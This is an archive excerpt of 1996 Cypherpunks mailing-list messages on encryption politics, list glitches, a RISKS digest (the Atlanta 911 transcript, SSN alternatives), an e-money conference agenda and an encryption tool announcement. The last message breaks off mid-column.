Message-ID: <321c65db.721494@mail.aa.net>
X-Mailer: Forte Agent .99e/16.227
Sender: owner-cypherpunks@toad.com
Precedence: bulk

   ----- Message body suppressed -----

- --GAA13919.840808533/tera.mcom.com--





> At 06:25 PM 8/23/96 -0700, Timothy C. May wrote:
> >At 1:10 AM 8/21/96, Skip wrote:
> >>   ----- Message body suppressed -----
> >>
> >
> >
> >Sounds good to me. Keep it up.
> 
> It looks like an internal mailing list version of Cypherpunks at
>  Netscape is
> feeding back into the regular list with weird results.
> 
> ---
> |  "Remember: You can't have BSDM without BSD. - alan@ctrl-alt-del.com 
>  "|
> |"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:        
>  |
> | mankind free in one-key-steganography-privacy!"  | Ignore the man     
>  |
> |`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the
>  keyboard.|
> |         http://www.teleport.com/~alano/          | alano@teleport.com 
>  |
> 
> 
> 

Lou Zirko                                (502)383-2175
Zystems                                  lzirko@c2.org
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQEVAwUBMh56UctPRTNbb5z9AQFi4Qf9HKkx+OBM4CdgkIsZvWRsiJ8PDR/TCzai
5vjLUFuDG2462VRHV5onGQ4KZo7XwnyGsjdAgUrx3XzXcXAbKyA3luDOkM5C/8Vk
YRBO3pLnCCBUB+54QVt65QgjMZ6JtuCuUZO3ntwwUL9Wde/Y1v0nmHXmuZZE++v3
tyrWrfDRh1aEuwGNjNcEEFQ9ZUEsM/y5RCvVlD/4VyvWSUvDejGItMnIbMWICs2j
jt48NNiMK3uU4A5bLDbonzgn4f6n21wF62AJwkAf3UB0DMwJ9DLz2isfOUe50B3h
FPw1FZqPvdOz5BV61bKcx2ABU5GZDEe+ZBZ5zdFZ7Xl7JaQbg46CYg==
=uBW8
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Sun, 25 Aug 1996 04:24:50 +0800
To: cypherpunks@toad.com
Subject: Re: Republican and Democratic party platforms [NOT!] on technology
In-Reply-To: <Pine.GUL.3.95.960822120928.25102B-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.960823193909.8657A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 22 Aug 1996, Rich Graves wrote, quoting me:

> > But the benefit of having a pro-privacy statement in the platform (which in
> > fact was watered down significantly from that originally proposed by
> > advocates on our side) is that the platform covers Republican Party
> > candidates for any office, not just the presidency.
> 
> One Republican staffer sent you an ass-kissing note quoting an ALLEGED piece
> of the platform WHICH IS NOT ACTUALLY THERE. The platform was finalized on
> August 12th. The text you quoted is not even in the list of rejected
> amendments.

Wrong. Check out what I've attached below.

Happily, I don't waste time listening to Rich's rants. I take this as a
lesson that his posts are, in fact, not worth the time it takes to delete
them. Rich, I suggest you stick to whining about MS Windows unless you
enjoy the embarrassment of being proved wrong, once again. 

-Declan

---

Muckraker
By Brock Meeks
http://www.hotwired.com/muckraker/

[...]

                The word "Internet" appears only once in the platform
                language. It's a small victory, but not an insignificant
                one. Two paragraphs are of particular interest - the last
                two in the "Creating Jobs for Americans" section. Here
                they are:
                
                "The communications revolution empowers individuals,
                enhances health care, opens up opportunity for rural
                areas, and strengthens families and institutions. A
                Dole-led Congress passed the Telecommunications Act of
                1996 to promote full and open competition and freedom of
                choice in the telecommunications marketplace. In
                contrast, the Clinton-Gore administration repeatedly
                defended big-government regulation. The micromanagement
                of the Information Age is an impediment to the
                development of America's information superhighway.
                
                "We support the broadest access to telecommunications
                networks and services, based upon marketplace
                capabilities. The Internet today is the most staggering
                example of how the Information Age can and will enhance
                the lives of Americans everywhere. To further this
                explosion of new-found freedoms and opportunities,
                privacy, through secured communications, has never been
                more important. Bob Dole and the Republican Party will
                promote policies that ensure that the US remains the
                world leader in science, technology, and innovation."
                
                First off, it's amazing to see the Republicans taking
                credit for the Telecommunications Reform Act because, in
                doing so, they also are taking credit for one of the most
                egregious attacks on the First Amendment in recent
                history: the passage of the Communications Decency Act,
                which was embedded in the telecom bill like a virus.

[...]

                The really interesting stuff comes after you decode the
                phrase "privacy, through secured communications." This
                really means: "the right to use private encryption
                technology." This brilliant gem was wedged into the
                platform, so I'm told, through the efforts of Senator
                Conrad Burns' staff. Burns, of course, is the author of
                the pro-crypto technology bill known as "Pro-CODE," which
                flies in the face of the administration's nearly paranoid
                anti-crypto policies.
                
[...]





// declan@eff.org // I do not represent the EFF // declan@well.com //







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Sat, 24 Aug 1996 05:05:23 +0800
To: ncognito@gate.net
Subject: Re: ctcp.0.9
In-Reply-To: <Pine.LNX.3.91.960823093958.882A-100000@HellSpawn>
Message-ID: <321DF0AA.64880EEB@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Damien Lucifer wrote:
> 
> This is a program i found on unimi that offers secure socket connections,
> utilitizing a simple server/client. It can be installed without root
> priveledges and uses d/h for key transfers. Anyone looked this package
> over, and if so what is your oppinion about it?
> 

It doesn't appear to have any host authentication, so is susceptible to
a man in the middle attack.

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 
^S
^A^Aoft FAT filesytem is extremely robust, ^Mrarely suffering from^T^T




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Sat, 24 Aug 1996 21:48:29 +0800
To: cypherpunks@toad.com
Subject: Suppressed Messages
Message-ID: <199608240251.TAA03475@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


What could be more fun on a Friday Night?  I think it's a great 
trick, however some may find it more than annoying.

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Sun, 25 Aug 1996 02:21:32 +0800
To: Asgaard <cypherpunks@toad.com
Subject: Wtf?????
In-Reply-To: <199608230341.DAA00616@fountainhead.net>
Message-ID: <Pine.3.89.9608232040.A14578-0100000@netcom22>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 23 Aug 1996, Vipul Ved Prakash wrote:

>    ----- Message body suppressed -----
> 
> --CAA28180.840792057/tera.mcom.com--
> 
> 
What's with all these messages like this???  Who's doing this and WHY???


---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daemon <jwilk@iglou.com>
Date: Sat, 24 Aug 1996 10:58:41 +0800
To: cypherpunks@toad.com
Subject: [off-topic] Re: Verdict in "MTV" Case
Message-ID: <m0uu6VZ-000bD7C@relay.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:15 AM 8/23/96 -0700, Timothy C. May wrote:
 
As the youngest Cypherpunk in the world (or at least i am aware of) I think
a little reply is in order from my self. 

> "Like, like the kids are, like,
>goofin' off. Besides, MTV doesn't like play enough old stuff, like Zeppelin
>and Floyd."
 
Thats what those old records are for. (no offense)

        If they are sueing MTV why not other TV stations....

        If I was going to sue someone for not doing my homework i would sue
Jarkko Oikarinen, the creator of IRC. I just think that this is really
        pathetic.... but then again I am famous for my flame replys in the past.
        
        Why not make the school pay MTV for keeping kids away from there station
        while they are doing homework (hehehe)

        FYI i thought this reply out.

        Blake Wehlage
        
==========================================
   Blake Wehlage <jwilk@iglou.com>
   ‡±" RëVðLû¡ØÑ Bø+ (c)ÖmP@ñ¥ (tm) "±‡
 Goto: http://members.iglou.com/jwilk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 24 Aug 1996 11:17:43 +0800
To: cypherpunks@toad.com
Subject: Some cypherpunks-relevant Risks articles
Message-ID: <01I8MN2K25089JDD4G@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	In regards to the first part (the 911 transcript), I was considering
the idea (common in cyberpunk RPGs) of a privately-set-up ambulance and
emergency room service, with monitors (possibly with action capabilities) on
registered clients. You'd want the data flow from and to the monitors
encrypted, of course.
	-Allen

From:	IN%"rre@weber.ucsd.edu" 20-AUG-1996 22:41:21.74
To:	IN%"rre@weber.ucsd.edu"
CC:	
Subj:	Risks: Atlanta 911 transcript, SSN's, web plagiarism

[If you've never seen the famous Olympic Park 911 transcript, it's worth
reading closely.  I'm embarrassed to say this, but it always reminds me
of the time I couldn't get a taxi in Chicago because I could tell the
dispatcher what intersection I was standing on but I could not see any
of the street addresses anywhere around me, and her dispatch computer
needed an address to dispatch a cab.  Dispatch systems requiring addresses
are one of those absolutely classic cases of system being driven by the
database designer rather than by the people who know how the system will
actually be used.  Database designers are fine people, but they shouldn't
be doing requirements analysis unless they're trained for it.  Also in
this issue of Risks is an interesting message from Robert Ellis Smith
about managing social security numbers and other identifiers for privacy,
and a funny/scary piece about web plagiarism.]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Mon, 19 Aug 1996 18:11:10 -0700 (PDT)
From: risks@csl.sri.com

RISKS-LIST: Risks-Forum Digest  Monday 19 August 1996  Volume 18 : Issue 35

----------------------------------------------------------------------

Date: Fri, 16 Aug 96 10:45:34 PDT
From: "Peter G. Neumann" <neumann@csl.sri.com>
Subject: The Atlanta 911 transcript

  [The following transcript of the Olympic 911 bomb call and the ensuing
  conversation suggests that many of our nontechnological risks are not
  being adequately addressed.  PGN]

http://www.cnn.com/US/9608/09/olympics.bomb.911/911.transcript.wir/transcript.html

Excerpts from a transcript released Thursday by the Atlanta Police
Department regarding the bomb threat telephoned to 911 on July 27. Times
have been converted from military time to standard notation, and punctuation
and spelling have been edited.  Parenthetical notes are part of the police
transcript except where labeled as an editor's note.

The transcript refers to these police terms: Code 73, bomb threat; and
Zone 5, a police precinct near Centennial Olympic Park.

The transcript did not explain the Zone 5 dispatcher's references to Code
17 and Code 8, which apparently were unrelated to the bomb call.

12:58:28 a.m.:  [Call to 911]

12:58:32 a.m.:  Atlanta Police Department 911 Operator: "Atlanta 911."
Caller:         "There is a bomb in Centennial Park, you have 30 minutes."
12:58:45 a.m.:  Caller hangs up.

1:01:20 a.m.:   911 operator calls APD Agency Command Center (all lines busy).
....

1:01:30 a.m.:   911 operator calls Zone 5 and notifies Zone 5 of Signal 73 and
                requests address of Centennial Park -- unable to get street
		address.

Dispatcher:     "Zone 5."
911 Operator:   "You know the address to Centennial Olympic Park?"
Dispatcher:     "Girl, don't ask me to lie to you."
911 Operator:   "I tried to call ACC but ain't nobody answering the phone ...
                but I just got this man called talking about there's a
                bomb set to go off in 30 minutes in Centennial Park."
Dispatcher:     "Oh Lord, child. One minute, one minute. I copy Code 17. OK,
                all DUI units are Code 8 and will not be able to
                assist on the freeway.
                Oh Lord, child. Uh, OK, wait a minute, Centennial
                Park, you put it in and it won't go in?"
911 Operator:   "No, unless I'm spelling Centennial wrong. How are we spelling
                Centennial?"
Dispatcher:     "C-E-N-T-E-N-N-I -- how do you spell Centennial?"
911 Operator:   "I'm spelling it right, it ain't taking."
Dispatcher:     "Yeah."
911 Operator:   "Centennial Park is not going. Maybe if I take 'park' out,
		maybe that will take. Let me try that."
Dispatcher:     "Wait a minute, that's the regular Olympic Stadium right?"
911 Operator:   "Olympic Stadium is like Zone 3, though. Centennial Park."
Dispatcher:     "That's the Centennial Park?"
911 Operator:   "It's near the Coca Cola Plaza, I think."
Dispatcher:     "In 5?"
911 Operator:   "Uh huh."
Dispatcher:     "Uh, hold on. Sonya, you don't know the address to the
		Centennial Park?"
2nd Dispatcher (in background): "Downtown."
911 Operator:   "Male, about 30."
Dispatcher:     "1546, Code 17, 23."
911 Operator:   "White."
Dispatcher:     "Uh, you know what? Ask one of the supervisors."
911 Operator:   "No, Lord help me, you know they don't know."
Dispatcher:     "I know, but it gets it off you."
911 Operator:   "Alrighty then, bye."
Dispatcher:     "Bye."

1:02:40 a.m.:   911 operator calls APD ACC for address (telephone line problem;
                operators cannot hear each other.) ...

1:02:50 a.m.:   911 operator calls APD ACC again and requests address for
                Centennial Park and is given the telephone number.

ACC:            "Atlanta Police, Agency Command Center."
911 Operator:   "Hey, can you hear me now?"
ACC:            "Uh huh."
911 Operator:   "OK, can you give me the address of the Centennial Park?"
ACC:            "I ain't got no address to Centennial Park, what y'all
		think I am?"
911 Operator:   "Can you help me find the address to Centennial Park?"
ACC:            "I can give you the telephone number of Centennial Park."
911 Operator:   "I need to get this bomb threat over there to y'all."
ACC:            "Well."
911 Operator:   "But I need the address of Centennial Park. It's not taking,
                the system is not taking Centennial Park, that's not
                where it came from, but you know the system is not
                taking Centennial Park, that's where he said the bomb was."
ACC:            "No particular street or what?"
911 Operator:   "He just said there's a bomb set to go off in 30 minutes in
                Centennial Park."
ACC:            "Ooh, it's going to be gone off by the time we find the
		address."
911 Operator:   "Are you kiddin'? Give me that, give me that."
ACC:            "I mean I don't have an address, I just have phone
                numbers."
911 Operator:   "Give me the phone number."
   ...

1:05:10 a.m.:   911 operator calls Centennial Park for street address and
		is placed on hold. Receives address at 1:07:10 a.m.

Centennial Park: "Centennial Park, this is Operator Morgan."
911 Operator:   "Hi, can you give me the address to Centennial Park?"
Cen Park:       "The address?"
911 Operator:   "Uh huh."
Cen Park:       "Uh, hold on a second."

1:06:30 a.m.:   911 operator notifies Communications Supervisor, Sgt.
		Montgomery.

911 Operator:   "Does anybody -- Sgt. Montgomery, do you know the address of
                Centennial Park? Do you know the address to Centennial Park.
                Well, I need to get the address of Centennial Park 'cause, I
                mean I don't mean to upset nobody, but we got a bomb threat
                over there."

(Editor's note: The transcript does not further indicate whether this
comment about a bomb threat was directed only to Sgt. Montgomery in the
911 center or to Centennial Park's Operator Morgan, who is shown to come
back on the line just after the comment.)

Cen Park:       "Ma'am."
911 Operator:   "Yes."
Cen Park:       "OK, it's 145 International Boulevard."
911 Operator:   "145 International Boulevard."
Cen Park:       "Uh huh."
911 Operator:   "OK."
Cen Park:       "All right, uh huh."
911 Operator:   "Thank you. Bye bye."

1:08:35 a.m.:   911 operator sent call to dispatch.

1:11:10 a.m.:
Dispatcher:     "1591. Radio raising 1594."
Unit 1594:      "1594. You call?"

1:11:20 a.m.:
Dispatcher:     "1594, that's affirmative, got a Signal 73 at 145
		International Boulevard. It came from the pay phone at
		the Days Inn.  The caller is advising that he has one set
		to go off in 30 minutes at Centennial Park. Sounded like
		a white male."

(Editor's note: The same information is then given to Unit 1593 and the
dispatcher calls Unit1546.)

1:12:30 a.m.:
Dispatcher:     "Did you copy?"

1:12:40 a.m.:
Unit 1546:      "1546. I copy. Advise the state police, they police that park.
                I'll go the Days Inn and see if I can locate the caller."
Dispatcher:     "OK, that's affirmative."


(Editor's note: There are sporadic entries over the next seven minutes.
Another officer,  designated Unit 1593, also instructs the dispatcher at
1:18:50 a.m. to "contact the state police supervisor." The transcript
contains no indication, however, that state police were notified.)

1:20:00 a.m.:
Unit 2924:      "2924 to Radio, be advised that something just blew up at
                Olympic Park."

------------------------------

Date: Fri, 16 Aug 96 15:24 EST
From: Robert Ellis Smith <0005101719@mcimail.com>
Subject: Alternatives to Social Security Numbers

Last spring, I asked readers of RISKS for suggestions on alternatives to
Social Security numbers in organizations with large data bases of
information about individuals.  Many such organizations find they do not
need to use SSNs, and avoid privacy problems associated with using them.
For a copy of all of the responses, send a request to us and specify whether
you want hard copy or electronic edition of our August issue, and provide
postal address or e-mail address.

Robert Ellis Smith, Publisher, Privacy Journal newsletter,
Providence, RI, 401/274-7861, e-mail 5101719@mcimail.com.

Excerpts from the suggestions follow:

* FROM WASHINGTON, D.C.: Maryland uses Soundex (of name and birth date
concatenated [linked in a chain]) both for driver and vehicle registrations.

* FROM CAMBRIDGE, MASS.: "Against Universal Health-Care Identifiers" in the
JOURNAL OF THE AMERICAN MEDICAL INFORMATICS ASSOCIATION 1:316-319, 1994, by
Dr. Peter Szolovits of MIT and Dr. Isaac Kohane of Children's Hospital in
Boston, discusses a number of ways in which cryptography- based health care
identifiers can be used to preserve privacy while remaining manageable for
typical medical purposes.  This is publication #49 (in Postscript format) at
http://medg.lcs.mit.edu/people/psz/publications.html.

* FROM YARDLEY, PA.: One way is to use a simple scheme like three letters
from last name, the first initial, and some digits; another is just to use
sequential numbers.  Another is an MD5 hash of the full-name string [a
one-way mathematical function as a stand-in for the name that makes
translation back to the original name impossible].  This is always unique
for a unique string, so you might need to add some numbers.

* FROM MADISON, WISC.: When I was working on the development of the
Wisconsin Student Data Handbook - we tried to develop
 what we called an "SSN surrogate," also of nine bytes per
individual.  It involved an algorithm which combined year,
month, and date of birth with sex and two consonants each
 extracted from the first and middle names.

* FROM CYBERSPACE: I worked with a banking software company that set up
employee records simply by exact hire date and time.  Since they never hired
anyone at exactly the same time, it gave each person a unique number.  You
could do the same for any data base in which records are added gradually one
at a time - just number them based on exact date and time added.

* FROM PALO ALTO, CAL.: At Stanford University we made a decision long ago
not to use SSN for identification except where required by law (payroll
taxes, for example).  We use a unique Stanford University ID (SUID), which
is a lifetime number and applies to all students, alumni, faculty, staff,
and patients.  It serves all the same purposes that the SSN would do if it
were used.  

------------------------------

Date: Wed, 14 Aug 1996 00:03:42 +0200
From: "Roy Dictus, NET" <roy@net.be>
Subject: The risk of plagiarism with Websites

My company recently got ripped off by a competitor.  We build Websites and
thus had constructed a site detailing our products and services.

A rival Website constructor (!) copied practically the entire site,
changing the background color, changing our name into theirs, and making
other slight changes like alignment, add and delete a word or phrase
here and there...

I complained about it, not only to them directly, but also on a local
USENET newsgroup (we're both located in Belgium, so the newsgroup was
be.providers).

On the phone they just laughed at me and admitted to copying, but on
USENET they claimed I had copied their site!

There's nothing I can do to prove them wrong, even though we both know
what happened.

The risk: if you put your materials on the Internet, where they can be
freely copied, make sure you have some way to prove you made them yourself,
and when you did it.

Roy Dictus, NET bvba, Internet Projects & Consulting  
roy@net.be  http://www.net.be

  [Interdictus becomes Enter Dictus.  PGN]

------------------------------

End of RISKS-FORUM Digest 18.35 
************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sun, 25 Aug 1996 07:31:52 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
In-Reply-To: <199608220351.UAA01292@mail.pacifier.com>
Message-ID: <v03007800ae44185e27d5@[166.84.220.80]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:49 -0800 8/21/96, jim bell wrote:

>At 10:55 PM 8/21/96 -0400, Brian Davis wrote:

>>That's because you like dead Presidents.
>>
>
>$50's and $100's are great!

Was Ben Franklin ($100) a President? I must have my list wrong or I did a
sideways time jump without knowing <g>.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Sun, 25 Aug 1996 05:38:12 +0800
To: Ross Wright <bdavis@thepoint.net>
Subject: Re: Spamming (Good or Bad?)
Message-ID: <199608240439.VAA05529@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About 21 Aug 96, 15:08, Brian Davis wrote:

>    ----- Message body suppressed -----
> 
> --WAA10812.840778802/tera.mcom.com--
> 
> 
> 

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Sun, 25 Aug 1996 05:16:12 +0800
To: ptrei@ACM.ORG
Subject: Re: USPS
In-Reply-To: <199608231401.HAA10139@toad.com>
Message-ID: <199608240345.WAA10974@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <199608231401.HAA10139@toad.com>, on 08/23/96 at 10:01 AM,
   "Peter Trei" <ptrei@ACM.ORG> said:

>Closing deals: Ever hear of faxes or FedEx?

>My personal impression was that Raines had been listening to his 
>own propaganda for too long, and was rather out of touch with the 
>way things are done outside of the Beltway. I got the feeling that 
>the USPS was desperately trying to find a role in a time where it
>was becoming merely the cheapest and slowest player in the 
>package delivery business. 

Ahhh... But you truly miss the buety of this system.

Once in place all the goverment needs to do is ban all e-mail not sent through their system. Add this to the outlawing of all non-keyescrowed encryption, and the ability to archive all messages sent through their system. Now the goverment would have total access to everything you wright.

Eventually they could get rid of all snail-mail. Put in place scaners with OCR, handwrighting reconition & voice dictation in local post offices for those without Inet access.

The even BIGGER PICTURE:

Eventually we will not have dial-up internet access the way it is today. Mater of fact we will not have phone systems the way we have today. Instead we will have 1 huge network, a SuperIneternet, inwhich all homes & business are connected. For those without computers in their homes will be small dumb terminals that will let them connect & provide basic services (such devices are being developed right now).

In such a system anyone could be monitored, at any time.

Sound far fetched? The technology is here now to do this. Just remember that the "powers to be" don't think in terms of months or years but decades. It may take 20-30yrs for such a system to be fully implimented. "They" are very patient.

1984? no, 2084 without a doubt!


- --
- -----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
- -----------------------------------------------------------
 
MR/2 Tag->Windows: Just another pane in the glass.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMh6EZI9Co1n+aLhhAQGh9QQAht8JS5rNOLyk3m8XlcXyjEFr5meerldB
9wDqhnaHJbgLmgC2NNcvAcYgGpAQfMRDHwzBXPX0PBCndXk87BfppFtnvexGOhgh
gD/170jrgbGbH1CDAvOCxtv4Hp0kM6qk1yO2IJcfPjhPZqD/mPyeUwV/MEpw4blE
iFUfY4Uvvsg=
=pho2
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 24 Aug 1996 14:54:26 +0800
To: cypherpunks@toad.com
Subject: Electronic Money Conference
Message-ID: <v03007803ae44160dc44f@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Fri, 23 Aug 1996 20:44 EDT
From: Somebody
Subject: Electronic Money Conference
To: rah@shipwright.com


http://www.occ.treas.gov/emoney.htm

How to Register . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . .. . . . . . . Speakers' Photos

          Toward Electronic Money & Banking: The Role of Government
   A Conference Sponsored by the United States Department of the Treasury
   A Conference Sponsored by the United States Department of the Treasury
   A Conference Sponsored by the United States Department of the Treasury
                                                                     [Image]
[Image]                   Sheraton Washington Hotel
                               Washington, DC
                            September 19-20, 1996

                        Thursday, September 19, 1996
----------------------------------------------------------------------------
             7:00 a.m. - Registration and Continental Breakfast
----------------------------------------------------------------------------
                         8:15 a.m. - Opening Address

                               KEYNOTE ADDRESS
          The Honorable Robert E. Rubin, Secretary of the Treasury
----------------------------------------------------------------------------
                          9:45 a.m. - Panel Session

                          International Cooperation
     A discussion of the major issues facing the international financial
 regulatory and law enforcement communities as electronic money systems and
                 banking on the Internet become a reality.
----------------------------------------------------------------------------
                            10:45 a.m. - Address

                               SPEAKER ADDRESS
      The Honorable Robert Pitofsky, Chairman, Federal Trade Commission
----------------------------------------------------------------------------
                         11:15 a.m. - Panel Session

                               Consumer Issues
    An exploration of the impact of emerging electronic money and banking
   technologies on consumers, including consumer disclosure requirements,
   assignment of liability, and challenges and opportunities for consumer
                           access and acceptance.
----------------------------------------------------------------------------
                            12:30 p.m. -Luncheon

                              LUNCHEON ADDRESS
             The Honorable John Reed, Chairman and CEO, Citicorp
----------------------------------------------------------------------------
                          2:15 p.m. - Panel Session

                         Security and Authentication
     A discussion of industry's interest in the commercial use of strong
  cryptographic techniques and the government's national security concerns,
    and a look at the role industry and government standards play in the
       implementation of encryption and authentication technologies.
----------------------------------------------------------------------------
                        4:00 p.m. - Concurrent Panels

                            Payment System Issues
 A discussion of domestic and international payment system issues raised by
  electronic money and banking systems, including consideration of new and
            future operational, settlement, and systemic risks.

                        E-Money Systems: Case Studies
   A look at actual experiences with operational E-money systems and pilot
 tests in Europe and the United States, impediments to consumer and merchant
          acceptance, and perspectives on the role of government.

                               Privacy Issues
   An examination of consumer privacy issues raised by the use of personal
information generated by electronic commercial and banking transactions, and
                a look at industry and government responses.
----------------------------------------------------------------------------
                           6:00 p.m. - Reception
----------------------------------------------------------------------------
                             7:00 p.m. - Dinner

                               DINNER ADDRESS
       The Honorable Alan Greenspan, Chairman, Federal Reserve Board

----------------------------------------------------------------------------
----------------------------------------------------------------------------

                         Friday, September 20, 1996
----------------------------------------------------------------------------
                     7:30 a.m. - Continental Breakfast
----------------------------------------------------------------------------
                         8:30 a.m. - Opening Address

                               KEYNOTE ADDRESS
   The Honorable Michael N. Castle, Chairman Subcommittee on Domestic and
   International Monetary Policy House Committee on Banking and Financial
                                  Services
----------------------------------------------------------------------------
                          9:00 a.m. - Panel Session

                        Law Enforcement Perspectives
    A look at law enforcement issues raised by the emerging technologies,
  including the effectiveness of the current regulatory scheme, traditional
   investigative techniques and analysis, and international jurisdictional
                             responsibilities.
----------------------------------------------------------------------------
                         10:45 a.m. - Panel Session

                  Electronic Money: Perspectives on Issuers
 A discussion of the institutional, financial, and operational criteria for
  successful issuers, including an exploration of the roles government and
          market forces play in establishing minimum requirements.
----------------------------------------------------------------------------
                            12:00 p.m. - Luncheon

                              LUNCHEON ADDRESS
                Eugene A. Ludwig, Comptroller of the Currency
----------------------------------------------------------------------------
                        2:00 p.m. - Conference Closes

----------------------------------------------------------------------------
                                 Questions:
                                   E-mail
                    Fax: E-Money Conference 202-874-5436

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Briggs <72124.3234@compuserve.com>
Date: Sat, 24 Aug 1996 19:36:58 +0800
To: cypherpunks@toad.com
Subject: Announce: Puffer 2.0 for Win 95
Message-ID: <199608240217.WAA09419@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have released a 32-bit version of Puffer 2.0 for Windows 95 and NT
systems.
It has the same features as the 16-bit version except it now supports
long
file names.  The exportable shareware version is available from my web
site at:

http://execpc.com/~kbriggs

An upgrade patch for registered users is also available there.  A brief
description of Puffer is provided below.

Kent Briggs

===========================================================================
Puffer is a general purpose encryption tool for Windows that protects
your
personal and business data as well as your e-mail correspondence.  Use
Puffer to securely exchange data over insecure channels.  Puffer uses
state-of-the-art encryption algorithms for maximum security.  The
shareware
version has been approved for export from the U.S. by the State
Department
through a commodity jurisdiction determination.

Features:

* 40-bit PC1 (RC4 clone) stream cipher
* 160-bit Blowfish block cipher (U.S./Canada registered version)
* Secure, multi-pass file wiping
* LZ77 compression
* Binary and ASCII archives
* Self-extracting executables
* Built-in editor
* Available in 16-bit and 32-bit editions
===========================================================================
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMh5mTCoZzwIn1bdtAQHEPAF/Qk62u4AF0n6lAYoTBzA7/R4yGtTaDfrT
1RK5QxMgjfWjmhq0coI2eVaI2Nm3si8Q
=rjn9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sun, 25 Aug 1996 10:19:14 +0800
To: cypherpunks@toad.com
Subject: blahPGP/Remailers in the News!
Message-ID: <199608240525.WAA15838@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



Here's an EXCELLENT column on PGP and remailers:

Roadside Attractions Along the Information Highway
	by Dave Farrell [roadside@branch.com]

Your e-mail doesn't have to be for everyone's eyes

	Sending e-mail over the Internet can be a very convenient and 
efficient way to communicate. If things are working right, you can dash 
off a memo to a friend or colleague halfway across the world and they'll 
receive it within minutes. (On the other hand, I've sent off important 
e-mail messages into cyberspace never to hear from them again, but 
that's another column.)
	A big drawback of the e-mail, however, is that it is not 
private. In fact, it's a lot like mailing a postcard to a friend. Just 
as a lot of people handle your postcard before it gets to its final 
destination, your e-email mesages pass through a lot of computers before 
they land in the recipient's in-box. In both cases, there are plenty of 
opportunites for people to read your messages before they get where 
they're going.
	You may not care if someone reads the bean dip recipe you're 
sending to your Aunt Clara, but sensitive monthly sales reports you're 
